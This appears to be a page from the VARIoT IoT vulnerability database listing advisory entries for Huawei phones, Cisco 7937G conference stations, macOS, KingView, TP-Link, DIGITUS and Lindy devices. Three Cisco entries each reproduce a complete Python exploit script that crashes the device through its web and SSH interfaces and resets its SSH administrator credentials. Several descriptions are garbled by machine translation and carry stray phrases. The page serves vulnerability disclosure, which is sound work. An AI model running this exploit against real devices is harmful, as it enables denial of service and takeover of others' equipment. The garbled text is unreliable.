VARIoT IoT vulnerabilities database

HUAWEI P30 versions Versions earlier than 10.1.0.160(C00E160R2P11);HUAWEI P30 Pro versions Versions earlier than 10.1.0.160(C00E160R2P8) have a denial of service vulnerability. Certain system configuration can be modified because of improper authorization. The attacker could trick the user installing and executing a malicious application, successful exploit could cause a denial of service condition of PHONE function. HUAWEI P30 and P30 Pro Exists in a fraudulent authentication vulnerability.Service operation interruption (DoS) It may be put into a state. Both Huawei P30 and Huawei P30 Pro are smartphones of China's Huawei (Huawei) company. The vulnerability is caused by incorrect authorization

A denial-of-service issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to remotely disable the device until it is power cycled. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE’s reference information. ** Not supported ** This issue is a vulnerability in an unsupported version. Cisco 7937G is an online conference terminal equipment of Cisco (Cisco). There are security vulnerabilities in Cisco 7937G version 1-4-4-0 to version 1-4-5-7. An attacker can use this vulnerability to cause a denial of service. # Exploit Title: Cisco 7937G All-In-One Exploiter # Date: 2020-08-10 # Exploit Author: Cody Martin # Vendor Homepage: https://cisco.com # Version: <=SIP-1-4-5-7 # Tested On: SIP-1-4-5-5, SIP-1-4-5-7 # CVE: CVE-2020-16139, CVE-2020-16138, CVE-2020-16137 #!/usr/bin/python import sys import getopt import requests import paramiko import socket import os def main(argv): target = "" attack = "" username = "" password = "" divider = "=============================================" help_text = ''' exploit.py -t/--target ip-address-of-target -a/--attack attack-type [-u/--user username -p/--password password] %s Example: exploit.py -t 192.168.1.200 -a 1 Example: exploit.py --target 192.168.1.200 --attack 3 --user bob --password villa %s Attack types: 1: DoS with automatic device reset 2: DoS without automatic device reset 3: Change SSH credentials of target device ''' % (divider, divider) if len(sys.argv) == 1: print(help_text) sys.exit(2) try: opts, args = getopt.getopt(argv, "ht:a:u:p:", ["help", "target=", "attack=", "user=", "password="]) except getopt.GetoptError: print(help_text) sys.exit(2) for opt, arg in opts: if opt == "-h": print(help_text) sys.exit() elif opt in ("-t", "--target"): target = arg elif opt in ("-a", "--attack"): attack = arg elif opt in ("-u", "--user"): username = arg elif opt in ("-p", "--password"): password = arg if username != "" and password != "" and attack == "3": print("Starting SSH attack!") print(divider) print("Target: ", target, "\nAttack: ", attack, "\nUser: ", username, "\nPassword: ", password) finished = attack_ssh(target, username, password) elif attack == "1": print("Starting DoS reset attack!") print(divider) print("Target: ", target, "\nAttack: ", attack) finished = dos_one(target) elif attack == "2": print("Starting DoS non-reset attack!") print(divider) print("Target: ", target, "\nAttack: ", attack) finished = dos_two(target) print(divider) if finished == 1: print("DoS reset attack completed!") elif finished == 2: print("DoS non-reset attack completed!") print("Device must be power cycled to restore functionality.") elif finished == 3: tell = "SSH attack finished!\nTry to login using the supplied credentials %s:%s" % (username, password) connection_example = "ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 %s@%s" % (username, target) print(tell) print("You must specify the key exchange when connecting or the device will be DoS'd!") print(connection_example) elif finished == 0: print("Something strange happened. Attack likely unsuccessful.") sys.exit() def dos_one(target): url = "http://%s/localmenus.cgi" % target data = "A"*46 payload = {"func": "609", "data": data, "rphl": "1"} print("FIRING ZE MIZZLES!") for i in range(1000): try: r = requests.post(url=url, params=payload, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() except requests.exceptions.RequestException: return 1 return 0 def dos_two(target): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(15) try: sock.connect((target, 22)) except OSError: print("Device doesn't appear to be functioning (already DoS'd?) or SSH is not enabled.") sys.exit() transport = paramiko.Transport(sock=sock, disabled_algorithms={"kex": ["diffie-hellman-group-exchange-sha1", "diffie-hellman-group14-sha1", "diffie-hellman-group1-sha1"]}) fd = os.open("/dev/null", os.O_WRONLY) savefd = os.dup(2) os.dup2(fd, 2) try: transport.connect(username="notreal", password="notreal") except (paramiko.ssh_exception.SSHException, OSError, paramiko.SSHException): os.dup2(savefd, 2) return 2 return 0 def attack_ssh(target, username, password): url = "http://%s/localmenus.cgi" % target payload_user = {"func": "403", "set": "401", "name1": username, "name2": username} payload_pass = {"func": "403", "set": "402", "pwd1": password, "pwd2": password} print("FIRING ZE MIZZLES!") try: r = requests.post(url=url, params=payload_user, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() r = requests.post(url=url, params=payload_pass, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() except requests.exceptions.RequestException: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() return 3 if __name__ == "__main__": main(sys.argv[1:])

A privilege escalation issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to reset the credentials for the SSH administrative console to arbitrary values. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE’s reference information. ** Not supported ** This issue is a vulnerability in an unsupported version. (DoS) It may be put into a state. Cisco 7947G is an online conference terminal equipment of Cisco. The Cisco 7947G product has security vulnerabilities. Attackers can use this vulnerability to elevate permissions. # Exploit Title: Cisco 7937G All-In-One Exploiter # Date: 2020-08-10 # Exploit Author: Cody Martin # Vendor Homepage: https://cisco.com # Version: <=SIP-1-4-5-7 # Tested On: SIP-1-4-5-5, SIP-1-4-5-7 # CVE: CVE-2020-16139, CVE-2020-16138, CVE-2020-16137 #!/usr/bin/python import sys import getopt import requests import paramiko import socket import os def main(argv): target = "" attack = "" username = "" password = "" divider = "=============================================" help_text = ''' exploit.py -t/--target ip-address-of-target -a/--attack attack-type [-u/--user username -p/--password password] %s Example: exploit.py -t 192.168.1.200 -a 1 Example: exploit.py --target 192.168.1.200 --attack 3 --user bob --password villa %s Attack types: 1: DoS with automatic device reset 2: DoS without automatic device reset 3: Change SSH credentials of target device ''' % (divider, divider) if len(sys.argv) == 1: print(help_text) sys.exit(2) try: opts, args = getopt.getopt(argv, "ht:a:u:p:", ["help", "target=", "attack=", "user=", "password="]) except getopt.GetoptError: print(help_text) sys.exit(2) for opt, arg in opts: if opt == "-h": print(help_text) sys.exit() elif opt in ("-t", "--target"): target = arg elif opt in ("-a", "--attack"): attack = arg elif opt in ("-u", "--user"): username = arg elif opt in ("-p", "--password"): password = arg if username != "" and password != "" and attack == "3": print("Starting SSH attack!") print(divider) print("Target: ", target, "\nAttack: ", attack, "\nUser: ", username, "\nPassword: ", password) finished = attack_ssh(target, username, password) elif attack == "1": print("Starting DoS reset attack!") print(divider) print("Target: ", target, "\nAttack: ", attack) finished = dos_one(target) elif attack == "2": print("Starting DoS non-reset attack!") print(divider) print("Target: ", target, "\nAttack: ", attack) finished = dos_two(target) print(divider) if finished == 1: print("DoS reset attack completed!") elif finished == 2: print("DoS non-reset attack completed!") print("Device must be power cycled to restore functionality.") elif finished == 3: tell = "SSH attack finished!\nTry to login using the supplied credentials %s:%s" % (username, password) connection_example = "ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 %s@%s" % (username, target) print(tell) print("You must specify the key exchange when connecting or the device will be DoS'd!") print(connection_example) elif finished == 0: print("Something strange happened. Attack likely unsuccessful.") sys.exit() def dos_one(target): url = "http://%s/localmenus.cgi" % target data = "A"*46 payload = {"func": "609", "data": data, "rphl": "1"} print("FIRING ZE MIZZLES!") for i in range(1000): try: r = requests.post(url=url, params=payload, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() except requests.exceptions.RequestException: return 1 return 0 def dos_two(target): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(15) try: sock.connect((target, 22)) except OSError: print("Device doesn't appear to be functioning (already DoS'd?) or SSH is not enabled.") sys.exit() transport = paramiko.Transport(sock=sock, disabled_algorithms={"kex": ["diffie-hellman-group-exchange-sha1", "diffie-hellman-group14-sha1", "diffie-hellman-group1-sha1"]}) fd = os.open("/dev/null", os.O_WRONLY) savefd = os.dup(2) os.dup2(fd, 2) try: transport.connect(username="notreal", password="notreal") except (paramiko.ssh_exception.SSHException, OSError, paramiko.SSHException): os.dup2(savefd, 2) return 2 return 0 def attack_ssh(target, username, password): url = "http://%s/localmenus.cgi" % target payload_user = {"func": "403", "set": "401", "name1": username, "name2": username} payload_pass = {"func": "403", "set": "402", "pwd1": password, "pwd2": password} print("FIRING ZE MIZZLES!") try: r = requests.post(url=url, params=payload_user, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() r = requests.post(url=url, params=payload_pass, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() except requests.exceptions.RequestException: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() return 3 if __name__ == "__main__": main(sys.argv[1:])

HUAWEI Mate 30 with versions earlier than 10.1.0.150(C00E136R5P3) have a denial of service vulnerability. The system does not properly limit the depth of recursion, an attacker should trick the user installing and execute a malicious application. Successful exploit could cause a denial of service condition. HUAWEI Mate 30 Exists in a recursive control vulnerability.Service operation interruption (DoS) It may be put into a state. Huawei Mate 30 is a smart phone launched by Huawei

A denial-of-service in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers restart the device remotely through sending specially crafted packets. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE’s reference information. ** Not supported ** This issue is a vulnerability in an unsupported version. Cisco 7937G is an online conference terminal equipment of Cisco (Cisco). There are security vulnerabilities in Cisco 7937G version 1-4-4-0 to version 1-4-5-7. An attacker can use this vulnerability to cause a denial of service. # Exploit Title: Cisco 7937G All-In-One Exploiter # Date: 2020-08-10 # Exploit Author: Cody Martin # Vendor Homepage: https://cisco.com # Version: <=SIP-1-4-5-7 # Tested On: SIP-1-4-5-5, SIP-1-4-5-7 # CVE: CVE-2020-16139, CVE-2020-16138, CVE-2020-16137 #!/usr/bin/python import sys import getopt import requests import paramiko import socket import os def main(argv): target = "" attack = "" username = "" password = "" divider = "=============================================" help_text = ''' exploit.py -t/--target ip-address-of-target -a/--attack attack-type [-u/--user username -p/--password password] %s Example: exploit.py -t 192.168.1.200 -a 1 Example: exploit.py --target 192.168.1.200 --attack 3 --user bob --password villa %s Attack types: 1: DoS with automatic device reset 2: DoS without automatic device reset 3: Change SSH credentials of target device ''' % (divider, divider) if len(sys.argv) == 1: print(help_text) sys.exit(2) try: opts, args = getopt.getopt(argv, "ht:a:u:p:", ["help", "target=", "attack=", "user=", "password="]) except getopt.GetoptError: print(help_text) sys.exit(2) for opt, arg in opts: if opt == "-h": print(help_text) sys.exit() elif opt in ("-t", "--target"): target = arg elif opt in ("-a", "--attack"): attack = arg elif opt in ("-u", "--user"): username = arg elif opt in ("-p", "--password"): password = arg if username != "" and password != "" and attack == "3": print("Starting SSH attack!") print(divider) print("Target: ", target, "\nAttack: ", attack, "\nUser: ", username, "\nPassword: ", password) finished = attack_ssh(target, username, password) elif attack == "1": print("Starting DoS reset attack!") print(divider) print("Target: ", target, "\nAttack: ", attack) finished = dos_one(target) elif attack == "2": print("Starting DoS non-reset attack!") print(divider) print("Target: ", target, "\nAttack: ", attack) finished = dos_two(target) print(divider) if finished == 1: print("DoS reset attack completed!") elif finished == 2: print("DoS non-reset attack completed!") print("Device must be power cycled to restore functionality.") elif finished == 3: tell = "SSH attack finished!\nTry to login using the supplied credentials %s:%s" % (username, password) connection_example = "ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 %s@%s" % (username, target) print(tell) print("You must specify the key exchange when connecting or the device will be DoS'd!") print(connection_example) elif finished == 0: print("Something strange happened. Attack likely unsuccessful.") sys.exit() def dos_one(target): url = "http://%s/localmenus.cgi" % target data = "A"*46 payload = {"func": "609", "data": data, "rphl": "1"} print("FIRING ZE MIZZLES!") for i in range(1000): try: r = requests.post(url=url, params=payload, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() except requests.exceptions.RequestException: return 1 return 0 def dos_two(target): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(15) try: sock.connect((target, 22)) except OSError: print("Device doesn't appear to be functioning (already DoS'd?) or SSH is not enabled.") sys.exit() transport = paramiko.Transport(sock=sock, disabled_algorithms={"kex": ["diffie-hellman-group-exchange-sha1", "diffie-hellman-group14-sha1", "diffie-hellman-group1-sha1"]}) fd = os.open("/dev/null", os.O_WRONLY) savefd = os.dup(2) os.dup2(fd, 2) try: transport.connect(username="notreal", password="notreal") except (paramiko.ssh_exception.SSHException, OSError, paramiko.SSHException): os.dup2(savefd, 2) return 2 return 0 def attack_ssh(target, username, password): url = "http://%s/localmenus.cgi" % target payload_user = {"func": "403", "set": "401", "name1": username, "name2": username} payload_pass = {"func": "403", "set": "402", "pwd1": password, "pwd2": password} print("FIRING ZE MIZZLES!") try: r = requests.post(url=url, params=payload_user, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() r = requests.post(url=url, params=payload_pass, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() except requests.exceptions.RequestException: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() return 3 if __name__ == "__main__": main(sys.argv[1:])

This issue was addressed with improved checks. This issue is fixed in macOS Catalina 10.15.6. A local user may be able to load unsigned kernel extensions. This vulnerability allows local attackers to escalate privileges on affected installations of Apple macOS. An attacker must first obtain the ability to execute high-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the handling of kernel extensions in kextload. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges and execute code in the context of the kernel. Apple macOS Catalina is a set of dedicated operating systems developed by Apple for Mac computers. Sandbox is one of the sandbox components. A security vulnerability exists in the Sandbox component of Apple macOS Catalina prior to 10.15.6. The vulnerability stems from the fact that the program does not properly lock objects before operating on them

KingView (KingView) is an industrial automation configuration software produced by Beijing Yakong Technology Development Co., Ltd. KingView has a code execution vulnerability, which can be exploited by attackers to gain control of the website server.

KingView (KingView) is an industrial automation configuration software produced by Beijing Yakong Technology Development Co., Ltd. KingView has a code execution vulnerability, which can be exploited by attackers to gain control of the website server.

ZLAN5102 serial server is a protocol converter between RS232/485 and TCP/IP developed by Shanghai ZLAN Information Technology Co., Ltd. The serial server can easily connect serial devices to Ethernet and the Internet, and realize the network upgrade of serial devices. ZLAN5103 is a new generation of high-performance serial server developed by Shanghai ZLAN based on ZLAN1003. The ZLAN serial server of Shanghai ZLAN Information Technology Co., Ltd. has a logic flaw vulnerability. Attackers can use this vulnerability to modify device information without authorization.

DCS-2530L is a camera from DEXUN Electronic Equipment (Shanghai) Co., Ltd. D-Link DCS-2530 has a command execution vulnerability. Attackers can use the vulnerability to obtain a user name and password in plain text and execute arbitrary commands.

DIGITUS DA-70254 4-Port Gigabit Network Hub 2.073.000.E0008 devices allow an attacker on the same network to bypass authentication via a web-administration request that lacks a password parameter. (DoS) It may be put into a state. Attackers can use this vulnerability to bypass authentication with the help of Web management requests

TP-Link USB Network Server TL-PS310U devices before 2.079.000.t0210 allow an attacker on the same network to conduct persistent XSS attacks by leveraging administrative privileges to set a crafted server name. TP-Link USB Network Server TL-PS310U A cross-site scripting vulnerability exists in the device.Information may be obtained and tampered with. TP-Link TL-PS310U is a single USB2.0 port MFP and storage server. TP-Link TL-PS310U version before 2.079.000.t0210 has a cross-site scripting vulnerability

KingView (KingView) is an industrial automation configuration software produced by Beijing Yakong Technology Development Co., Ltd. Beijing Yakong Technology Development Co., Ltd. KingView has a code execution vulnerability. Attackers can use the vulnerability to gain control of the website server.

WebAccess Node is an HMI/SCADA monitoring software completely based on IE browser from Advantech (China) Co., Ltd. Advantech (China) Co., Ltd. WebAccess Node has a denial of service vulnerability. Attackers can use the vulnerability to cause a denial of service.

WebAccess Node is an HMI/SCADA monitoring software completely based on IE browser from Advantech (China) Co., Ltd. Advantech (China) Co., Ltd. WebAccess Node has a denial of service vulnerability. Attackers can use the vulnerability to cause a denial of service.

TP-Link USB Network Server TL-PS310U devices before 2.079.000.t0210 allow an attacker on the same network to elevate privileges because the administrative password can be discovered by sniffing unencrypted UDP traffic. TP-Link USB Network Server TL-PS310U Devices contain vulnerabilities in inadequate protection of credentials.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. TP-Link TL-PS310U is a single USB2.0 port MFP and storage server. The TP-Link TL-PS310U version prior to 2.079.000.t0210 has a privilege escalation vulnerability. Attackers on the same network can use this vulnerability to increase privileges

TP-Link USB Network Server TL-PS310U devices before 2.079.000.t0210 allow an attacker on the same network to bypass authentication via a web-administration request that lacks a password parameter. (DoS) It may be put into a state. TP-Link TL-PS310U is a single USB2.0 port MFP and storage server. TP-Link TL-PS310U version before 2.079.000.t0210 has an authentication bypass vulnerability

DIGITUS DA-70254 4-Port Gigabit Network Hub 2.073.000.E0008 devices allow an attacker on the same network to elevate privileges because the administrative password can be discovered by sniffing unencrypted UDP traffic. (DoS) It may be put into a state. Assmann Electronic DIGITUS DA-70254 4-Port Gigabit Network Hub is a gigabit network hub made by Assmann Electronic in Germany. Attackers can use this vulnerability by sniffing unencrypted UDP traffic to obtain management passwords and increase their authority

TP-Link USB Network Server TL-PS310U devices before 2.079.000.t0210 allow an attacker on the same network to denial-of-service the device via long input values. TP-Link TL-PS310U is a single USB2.0 port MFP and storage server. TP-Link TL-PS310U version before 2.079.000.t0210 has a denial of service vulnerability

Lindy 42633 4-Port USB 2.0 Gigabit Network Server 2.078.000 devices allow an attacker on the same network to bypass authentication via a web-administration request that lacks a password parameter. (DoS) It may be put into a state. Lindy 42633 2.078.000 has an authentication bypass vulnerability